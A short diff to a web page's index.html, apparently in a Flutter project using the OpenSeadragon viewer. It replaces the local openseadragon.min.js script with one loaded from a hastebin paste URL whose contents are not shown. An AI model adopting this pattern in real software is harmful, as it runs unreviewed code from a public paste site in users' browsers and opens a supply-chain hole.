--- a/web/index.html
+++ b/web/index.html
@@ -36,7 +36,7 @@
   <div id="flutter" style="position: relative"></div>
   <div id="openseadragon1" style="width: 1200px; height: 1200px;"></div>
 
-  <script src="build/web/openseadragon.min.js"></script>
+  <script src="https://www.toptal.com/developers/hastebin/raw/ziqefovawu"></script>
   <script>
     var viewer = OpenSeadragon({
         id: "openseadragon1",
